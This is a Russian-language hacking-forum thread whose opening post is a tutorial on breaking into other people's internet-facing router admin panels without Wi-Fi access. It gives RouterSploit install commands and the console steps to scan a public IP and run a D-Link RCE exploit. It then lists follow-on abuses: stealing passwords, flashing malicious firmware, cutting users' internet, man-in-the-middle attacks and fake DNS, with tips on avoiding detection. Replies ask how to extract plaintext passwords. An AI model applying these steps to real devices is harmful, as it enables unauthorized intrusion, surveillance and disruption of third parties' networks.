Взлом админки роутера

Combat

Постоялец
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА

Combat

Постоялец
ДРУЗЬЯ ФОРУМА
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
19 Окт 2018
Сообщения
824
Реакции
588
Репутация
0
eRub
19,323
Для просмотра содержимого вам необходимо авторизоваться.

Копипаст
Сегодня я расскажу о том, как взломать админку роутера из сети, не имея доступа к wi-fi.
По-умолчанию, большинство админок роутеров закрыты извне (из интернета), и в лучшем случае ты можешь видеть только открытые порты с помощью сканирования. В худшем - не видеть даже их.



Да, авторизация у разных устройств тоже происходит по-разному.

Одни аутентифицируются просто по HTTP напрямую. Другие для этого юзают формы авторизации.



Если устройство первого типа, то в браузере будет всплывающая табличка с RouterName и полями логин/пасс. Роутеры второго типа открывают вполне конкретную веб-страницу, а дальше порядок похожий.



Устройства и первого и второго типа могут использовать разные методы авторизации.

Это либо с использованием MD5 шифрования, либо “классику” - с прямой передачей пары логин/пасс.

8dc0c7c0dad43eba7ce6d (1).jpg

Если роутер использует хотя бы один из этих способов, что особенно популярно у старых моделей. Я использую программу RouterScan. Она умеет работать только с такими типами роутеров. Как понятно из названия - можно одновременно и сканировать сетку, и подбирать пары лог/пасс

К сожалению, у нас возникли траблы - роутеры нашли подходящие, кое-какие из них даже в сеть смотрят открыто, но используют веб-форму для авторизации (с сайтом и т.д.) со способами входа, отличными от нашего, и поэтому напрямую взломать их с помощью только этой программы не получится.

Впрочем, можно указывать другие диапазоны ip-шников, подбирать подходящие роутеры… Вероятность успеха при достаточном количестве итераций - высока, но у меня дерьмовый ноут, я попробую другой путь...



RouterSploit - это программный модуль, выполняющий и сканирование сетки, и поиск уязвимостей, и атаки.

Швейцарский нож, короче.



У него есть всего три типа модулей: exploits, creds и scanners. Сканеры проверяют цели на уязвимости, креды проверяют аутентификационные данные на конкретных сервисах, а эксплоиты - это модули, которые непосредственно эксплуатируют уязвимости.



Вся эта кухня может тупо брутить пароли по умолчанию, а может заниматься перебором.



Сообщество, однако, развивает софтину не слишком активно, а ведь от его активности как раз напрямую зависит эффективность инструмента.



Работать вся эта штуковина у нас будет на Kali, ты можешь установить его себе:



apt-get install python3-pip​
git clone

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

cd routersploit​
python3 -m pip install -r requirements.txt​
python3 rsf.py​


либо на Ubuntu:

sudo add-apt-repository universe​
sudo apt-get install git python3-pip​
git clone

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.

cd routersploit​
python3 -m pip install setuptools​
python3 -m pip install -r requirements.txt​
python3 rsf.py​
Установили это говно, теперь пробуем что-нибудь ломать.

Я заранее знаю адрес роутера, ты ищи свои.

Запускаем программу с помощью команды:

routersploit (или ./rsf.py)​
e39ba3fc7f047d0df243e.jpg
Программа запущена, вводим

use scanners/autopwn​



теперь вводим

show options​
и смотрим доступные

41d2c33b53a5abac63145.jpg
предварительно я нашел подходящий роутер, его ip-шник (изменен) будет 88.88.188.88

установим его:

set target 88.88.188.88​
set port 80​





чтобы запустить модуль, пишем

run​
6701d14c77e415585e694.jpg
Поздравляю, мы нашли роутер, роутер уязвим.

Две последние строки после [+] говорят нам об этом.

Раз нашли уязвимость, давайте выберем соответствующий модуль:

use exploits/dlink/dir_300_600_rce​
установим цель

set target [нащ ipшник]​
и пишем

run​





в нашем случае это означает, что все, что ты отправишь туда. будет отправлено роутеру напрямую.



Как понятно из мана, результаты работы самой программы можно использовать примерно следующим образом:

  • получить пароль текстом
  • получить пароль MD5
  • удаленное выполнение команд
  • походы по папкам роутера, скачивание файлов
  • смена пароля
как только у нас появляется возможность так или иначе пройти первый этап аутентификации, у нас появляется потенциальная возможность (в каждом случае - абсолютно индивидуально) делать что-нибудь из следующего списка:

  • перепрошить девайс хитровыебанной прошивкой (но это сложно, нужно глубоко понимать суть устройства не только ОС роутера, но и иметь навыки упаковки/распаковки этих прошивок);
  • отрубить пользакам девайса доступ к инету, остановить работу других служб);
  • если в роутере есть хотя бы мало-мальская поддержка VPN, то можно заставить его ходить через специально обученный VPN, при этом мы получаем полный пакет атак MITM;
  • узнать пароль от WI-FI и далее - тоже MITM;
  • изменить настройки на подложный DNS (но так делать не стоит, т.к. вероятность выезда за вами в этом случае значительно увеличивается)
Собственно, ваша задача - поискать подходящий роутер в сети или попробовать взломать хотя бы свой собственный девайс (кстати, свой личный роутер лучше хакать тупо с помощью гидры (hydra) - это быстрее, проще)

В следующей статье попробуем провернуть один из четырех перечисленных пунктов .

Удачи.
 
Последнее редактирование:

Al Sinatra

Администратор
АДМИНИСТРАТОР
SKYNET-CLUB
PAYPAL GROUP
ЮБИЛЕЙНАЯ ЛЕНТА

Al Sinatra

Администратор
АДМИНИСТРАТОР
SKYNET-CLUB
PAYPAL GROUP
ЮБИЛЕЙНАЯ ЛЕНТА
Регистрация
4 Июн 2018
Сообщения
1,885
Реакции
466
Репутация
32
eRub
11,780
ГАРАНТ
3

Полезная тема!
 

SOkoko999

Участник

SOkoko999

Участник
Регистрация
21 Апр 2019
Сообщения
8
Реакции
3
Репутация
1
eRub
15
А как потом можно поднимать l2tp автоматически никто не может подскать?буду очень благодарен,уже пол гугла излазил)
 
  • Нравится
Реакции: cfhf7 и ndrey86
Недавно полученная репутация:
cfhf7 +1 репутации (xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion link-base.org)

Xiomik

Новичок

Xiomik

Новичок
Регистрация
6 Июл 2021
Сообщения
1
Реакции
0
Репутация
0
eRub
12
А какой командой получить пароли в текстовом виде?
 
Сверху